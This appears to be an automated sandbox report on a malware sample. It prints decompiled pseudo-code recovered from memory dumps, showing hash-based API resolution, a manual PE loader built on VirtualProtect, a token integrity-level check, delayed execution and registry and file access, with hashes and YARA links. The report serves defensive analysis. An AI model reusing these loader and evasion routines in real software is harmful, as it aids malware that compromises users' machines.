Opcode ID: c41764b4b22599ad96f7e5e49382c181840be25f8d8d4c7d3771aa39701f162a
Instruction ID: abd8134f3eee5ccc53a8e066b2f27d375d5a7691d852f81ea750de6f1de6462d
Opcode Fuzzy Hash: c41764b4b22599ad96f7e5e49382c181840be25f8d8d4c7d3771aa39701f162a
Instruction Fuzzy Hash: 5F22C272A0E362AFE720DB24C850BEB77E9AF8530CF50991DE4959B1E0DB70E845C752

Uniqueness

Uniqueness Score: -1.00%

Function 6F03223C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6F03223C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6F033AD0(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6F033044(0xfe338407, 0x8f5bb83f, 0xfe338407, 0xfe338407);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6f03223c
0x6f032240
0x6f03225c
0x6f03225f
0x6f032242
0x6f032251
0x6f032254
0x6f032254
0x6f03226f
0x6f032274
0x6f032278
0x6f032280
0x6f032280
0x6f032284

APIs

NtDelayExecution.NTDLL(00000000,00000000,FE338407,FE338407,FFFFFFFF,FFFFFFFF,6F02355F,00000000,00000000,?), ref: 6F032280

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: db212ea4dfa68ed3d9912cf2bef15392d4988c166d1d2ad10caf7cac4354cdb6
Instruction ID: 873fcfd843171fe1d73fcb4a45e80960a471181afcb0bc45ed26b7d75aed8a4e
Opcode Fuzzy Hash: db212ea4dfa68ed3d9912cf2bef15392d4988c166d1d2ad10caf7cac4354cdb6
Instruction Fuzzy Hash: CBE092B1A0E3237EE7449B288D41F3BB7D89F94710F30862DB055C36C4EB70D80186A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F032840, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F032840(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6F033044(0xfe338407, 0x9a85f5ac, 0xfe338407, 0xfe338407) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6f032847
0x6f032850
0x6f03285e
0x6f032881
0x6f032881
0x6f032860
0x6f032877
0x6f03287b
0x00000000
0x6f03287d
0x6f03287d
0x6f03287d
0x6f03287b
0x6f032886

APIs

NtAllocateVirtualMemory.NTDLL(6F0388BE,?,00000000,000000FF,6F0388BE,6F0388BE,FE338407,FE338407,?,?,6F0388BE,00003000,00000004,000000FF), ref: 6F032877

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f3de004074fa0178ab962fca098d2182b0b14321d406f2325e43184ef25fdc64
Instruction ID: 887d7adc56dcfcdb8f0666f8c9ce0f313bc294984cbc82a14252b0fd7385b376
Opcode Fuzzy Hash: f3de004074fa0178ab962fca098d2182b0b14321d406f2325e43184ef25fdc64
Instruction Fuzzy Hash: 49E03072609353AFEB08DB24CD14E7BB7E9EF84704F50481DB494C6150D731D8109B51

Uniqueness

Uniqueness Score: -1.00%

Function 6F033110, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6F033110(intOrPtr* __ecx) {
				void* _t1;

				_push(E6F033488);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6f033110
0x6f033115
0x6f033117
0x6f033119

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6F033488,6F033100,FE338407,FE338407,?,6F026CB9,00000000), ref: 6F033117

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: e1d49c33c6385762099f22e1428bb2f93bc4f460557504f138efa1d83e1fdf7c
Instruction ID: 74c61efbabfd4af0a8f9ec0fee4a407e28824f23d524a6974843fecdd7487199
Opcode Fuzzy Hash: e1d49c33c6385762099f22e1428bb2f93bc4f460557504f138efa1d83e1fdf7c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 027B2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E027B2062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x27b4418 = 1;
				asm("movaps xmm0, [0x27b3010]");
				asm("movups [0x27b4428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E027B26BF();
				E027B23B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E027B26BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E027B26BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x27b4418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x027b206e
0x027b207c
0x027b2083
0x027b2086
0x027b2090
0x027b2097
0x027b20a1
0x027b20a7
0x027b20b0
0x027b20b9
0x027b20bc
0x027b20c2
0x027b20c6
0x027b20ce
0x027b20d5
0x027b20d8
0x027b20db
0x027b20de
0x027b20e1
0x027b20fb
0x027b2101
0x027b2104
0x027b210c
0x027b2110
0x027b2113
0x027b2116
0x027b2119
0x027b211c
0x027b2138
0x027b2155
0x027b217a
0x027b217c
0x027b2185
0x027b2188
0x027b2192
0x027b2195
0x027b2198
0x027b219b
0x027b219e
0x027b236f
0x027b236f
0x027b22ce
0x027b22d4
0x027b21a9
0x027b21b7
0x027b21bf
0x027b21c2
0x027b21c4
0x027b21ca
0x027b21d6
0x027b21d9
0x027b21dc
0x027b21df
0x027b23b1
0x027b23b1
0x027b22ef
0x027b22f5
0x027b22fb
0x027b2301
0x027b2307
0x027b230d
0x027b2313
0x027b2316
0x027b2319
0x027b2321
0x027b2329
0x027b232f
0x027b2335
0x027b233b
0x027b2341
0x027b234f
0x027b22bb
0x027b22c1
0x027b22c1
0x027b22da
0x027b238e
0x027b2394
0x027b21ea
0x027b21ea
0x027b2204
0x027b2229
0x027b2238
0x027b223b
0x027b223f
0x027b2243
0x027b224a
0x027b2250
0x027b2252
0x027b225b
0x027b226c
0x027b2272
0x027b2278
0x027b227b
0x00000000
0x00000000
0x027b2281
0x00000000
0x027b21ea
0x027b22aa

APIs

VirtualProtect.KERNELBASE ref: 027B20E1
VirtualProtect.KERNELBASE ref: 027B217A

Strings

\, xrefs: 027B2321

Memory Dump Source

Source File: 00000003.00000002.870278217.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 5056145fab7dbe733b1c5e6587db48077ae2b981bcd96b05962b55456ea4ff7f
Instruction ID: 8d30d8b4a8db3ecf721048208ba7e284a2b5262b3c4f0f454eecd332a6a8f7b9
Opcode Fuzzy Hash: 5056145fab7dbe733b1c5e6587db48077ae2b981bcd96b05962b55456ea4ff7f
Instruction Fuzzy Hash: 1891BDB4E052188FDB04CFA9C580A9DFBF1FF48314F25846AE958AB352D334A991CF91

Uniqueness

Uniqueness Score: -1.00%

Function 027B21EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 027B2250

Strings

\, xrefs: 027B2321

Memory Dump Source

Source File: 00000003.00000002.870278217.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: b11b77080cd43897efab2520323989eb7426ed7fa2ab364d4edc662c8bcd33f5
Instruction ID: 1efa341fc6177f91a98a364b0e7d2d29f5e50000a1a0d9fbb276b4c51571967b
Opcode Fuzzy Hash: b11b77080cd43897efab2520323989eb7426ed7fa2ab364d4edc662c8bcd33f5
Instruction Fuzzy Hash: FB51C0B5E012298FCB14CF59C980A9DFBF1BF88314F2685A9D958A7312D730AD91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F0310C8, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6F0310C8(void* __ecx) {
				long _v12;
				void* _v20;
				void* _v24;
				long _v32;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v64;
				void* _v88;
				void* _v92;
				int _t33;
				signed char* _t35;
				intOrPtr* _t40;
				intOrPtr _t41;
				long* _t50;
				intOrPtr* _t59;
				intOrPtr* _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				signed char* _t70;
				void* _t72;
				long* _t74;

				_t74 =  &_v32;
				_t69 = __ecx;
				_v12 = 0;
				_t59 = E6F033044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
				if(_t59 != 0) {
					 *_t59(_t69, 8,  &_v12);
				}
				_t50 = _t74;
				 *_t50 = _v12;
				_t50[1] = 1;
				if(E6F02C2C4(_t50) != 0) {
					L6:
					if(_t74[1] != 0) {
						E6F02BB88(_t74);
					}
					return 0;
				} else {
					_t74[6] = 0;
					if(E6F033044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
					}
					_t26 = _t74[6];
					if(_t74[6] != 0) {
						E6F02F5A8( &_v32, _t26);
						_t68 = E6F02F4E0( &(_t74[3]), 0);
						if(E6F033044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) == 0) {
							L32:
							E6F02F678( &_v32);
							goto L6;
						}
						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
						if(_t33 == 0) {
							goto L32;
						}
						_t35 = E6F033044(0x8b9d0da7, 0xc660b8b, 0x8b9d0da7, 0x8b9d0da7);
						if(_t35 == 0) {
							goto L32;
						}
						_push( *_t68);
						asm("int3");
						asm("int3");
						_t70 = _t35;
						if(_t70 == 0) {
							goto L32;
						}
						_t65 = E6F033044(0x8b9d0da7, 0x86f13b09, 0x8b9d0da7, 0x8b9d0da7);
						if(_t65 == 0) {
							goto L32;
						}
						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
						if(_t40 == 0) {
							goto L32;
						}
						_t41 =  *_t40;
						if(_t41 == 0) {
							_t72 = 1;
						} else {
							if(_t41 == 0x1000) {
								_t72 = 2;
							} else {
								if(_t41 == 0x2100) {
									_t72 = 4;
								} else {
									if(_t41 == 0x2000) {
										_t72 = 3;
									} else {
										if(_t41 == 0x3000) {
											_t72 = 5;
										} else {
											if(_t41 == 0x4000) {
												_t72 = 6;
											} else {
												_t66 = 7;
												_t72 =  ==  ? _t66 : 0;
											}
										}
									}
								}
							}
						}
						E6F02F678( &_v48);
						if(_v52 != 0) {
							E6F02BB88(_t74);
						}
						return _t72;
					}
					goto L6;
				}
			}

0x6f0310ca
0x6f0310d7
0x6f0310d9
0x6f0310e8
0x6f0310ec
0x6f0310f6
0x6f0310f6
0x6f0310fc
0x6f0310ff
0x6f031101
0x6f03110c
0x6f031146
0x6f03114b
0x6f031150
0x6f031150
0x00000000
0x6f03110e
0x6f031118
0x6f03112b
0x6f03113c
0x6f03113c
0x6f03113e
0x6f031144
0x6f031162
0x6f031172
0x6f031189
0x6f03126b
0x6f03126f
0x00000000
0x6f03126f
0x6f03119f
0x6f0311a3
0x00000000
0x00000000
0x6f0311b5
0x6f0311bc
0x00000000
0x00000000
0x6f0311c2
0x6f0311c4
0x6f0311c5
0x6f0311c6
0x6f0311ca
0x00000000
0x00000000
0x6f0311e1
0x6f0311e5
0x00000000
0x00000000
0x6f0311f2
0x6f0311f6
0x00000000
0x00000000
0x6f0311f8
0x6f0311fc
0x6f03124b
0x6f0311fe
0x6f031203
0x6f031246
0x6f031205
0x6f03120a
0x6f031241
0x6f03120c
0x6f031211
0x6f03123c
0x6f031213
0x6f031218
0x6f031237
0x6f03121a
0x6f03121f
0x6f031232
0x6f031221
0x6f031223
0x6f03122b
0x6f03122b
0x6f03121f
0x6f031218
0x6f031211
0x6f03120a
0x6f031203
0x6f031250
0x6f03125a
0x6f03125f
0x6f03125f
0x00000000
0x6f031264
0x00000000
0x6f031144

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 6F03113C
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,00000000,00000000,8B9D0DA7,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 6F03119F

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: c3dc9b7fe7cd93b30242d8f3ceac6aa5c807eefe08534b10b92fe5e24778250c
Instruction ID: a63df3ba0c7b65e4a416ae591e957d150e2377134292e42653f193b72c8ea371
Opcode Fuzzy Hash: c3dc9b7fe7cd93b30242d8f3ceac6aa5c807eefe08534b10b92fe5e24778250c
Instruction Fuzzy Hash: 8341F776E483236BE71195298C50FEF66EDAB89704F10C82AF550CB1D0DB74E855C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F03578C, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F03578C(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6F03303C(0x8b9d0da7, 0xcaca77b9) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6F02F84C(_a8, _t15);
							if(E6F03303C(0x8b9d0da7, 0xcaca77b9) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6F02F4E0(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6f035790
0x6f035791
0x6f035793
0x6f035798
0x6f03579f
0x6f0357a3
0x6f0357a3
0x6f0357a3
0x6f0357a7
0x6f0357ed
0x6f0357ed
0x6f0357a9
0x6f0357a9
0x6f0357af
0x6f0357b8
0x6f0357bb
0x6f0357d2
0x6f0357e3
0x6f0357e3
0x6f0357e5
0x6f0357eb
0x6f0357f6
0x6f03580e
0x6f03582e
0x6f03582e
0x6f035830
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6f0357af
0x6f035838

APIs

RegQueryValueExA.KERNELBASE(?,6F03D1F8,00000000,?,00000000,00000000,?,?,?,6F03D1F8,?,6F03585F,?,00000000,00000000), ref: 6F0357E3
RegQueryValueExA.KERNELBASE(?,6F03D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6F03D1F8,?,6F03585F,?,00000000), ref: 6F03582E

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 374863256b0e4b882093bf6f263c3d082ec5091167468ad574677fa6ce860210
Instruction ID: 35763adffe08855141d71b5c4541e378e4c5be332cd98e46620216f0cc216fb2
Opcode Fuzzy Hash: 374863256b0e4b882093bf6f263c3d082ec5091167468ad574677fa6ce860210
Instruction Fuzzy Hash: C811843A608317EBD7209A29DC81FBB7BECEF85654F00851EB594D7191DA21F800C671

Uniqueness

Uniqueness Score: -1.00%

Function 6F035B14, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6F035B14(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6F02D210(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6F02D714(__ecx, _t60);
					E6F02D03C(_t56,  *_t60);
					E6F02D020(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6F036288(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6F03303C(0x10154545, 0xdb1c336e) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6F02C2B0(_t40);
					if(E6F02C2C4(_t40) != 0) {
						_t56[2] = E6F0335C8(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6F03303C(0x10154545, 0x95343033);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6F033670(_t59, 0xff, 8);
						if(E6F03303C(0x10154545, 0x5b739044) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6f035b1b
0x6f035b1d
0x6f035b2a
0x6f035b2e
0x6f035b32
0x6f035b3c
0x6f035b43
0x6f035b43
0x6f035b4a
0x6f035b4c
0x6f035b51
0x6f035b5a
0x6f035b62
0x6f035b62
0x6f035b53
0x6f035b55
0x6f035b55
0x6f035b51
0x6f035b67
0x6f035b73
0x6f035ca4
0x6f035be1
0x6f035bea
0x6f035beb
0x6f035bf0
0x6f035bf1
0x6f035be3
0x6f035be5
0x6f035be5
0x6f035c07
0x6f035c1b
0x6f035c09
0x6f035c16
0x6f035c18
0x6f035c18
0x6f035c1d
0x6f035c22
0x6f035c30
0x6f035c9b
0x00000000
0x6f035c32
0x6f035c37
0x6f035c84
0x6f035c86
0x6f035c88
0x6f035c92
0x6f035c92
0x6f035c88
0x6f035c39
0x6f035c45
0x6f035c5e
0x6f035c60
0x6f035c61
0x6f035c62
0x6f035c64
0x6f035c66
0x6f035c67
0x6f035c67
0x00000000
0x6f035c6a
0x6f035b79
0x6f035b89
0x6f035b89

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5be6ea3eba4225d5257f1c6f451f1b536dd8e4e3305fe65a1955088d0bd5342b
Instruction ID: cecf56614670b28f48c423f8688dfb7a864daa349ed9d7eab6809e84f61e3ce0
Opcode Fuzzy Hash: 5be6ea3eba4225d5257f1c6f451f1b536dd8e4e3305fe65a1955088d0bd5342b
Instruction Fuzzy Hash: D8313A3BB5432BAFE7102A788D81F7F72D9EF8624CF404529FA519B1D1DE25D9058222

Uniqueness

Uniqueness Score: -1.00%

Function 6F035B95, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6F035B95(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6F03303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6F02C2B0(_t24);
				if(E6F02C2C4(_t24) != 0) {
					_t34[2] = E6F0335C8(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6F03303C(0x10154545, 0x95343033);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6F033670(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6F03303C(0x10154545, 0x5b739044) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6f035b95
0x6f035b99
0x6f035b9c
0x6f035b9f
0x6f035be1
0x6f035bea
0x6f035bf0
0x6f035bf1
0x6f035be3
0x6f035be5
0x6f035be5
0x6f035c07
0x6f035c1b
0x6f035c09
0x6f035c16
0x6f035c18
0x6f035c18
0x6f035c1d
0x6f035c22
0x6f035c30
0x6f035c9b
0x6f035c9e
0x6f035c32
0x6f035c37
0x6f035c84
0x6f035c88
0x6f035c92
0x6f035c92
0x6f035c88
0x6f035c39
0x6f035c45
0x6f035c4a
0x6f035c5e
0x6f035c60
0x6f035c61
0x6f035c62
0x6f035c64
0x6f035c66
0x6f035c67
0x6f035c67
0x6f035c6a
0x6f035c6a
0x6f035c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6F035C16

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
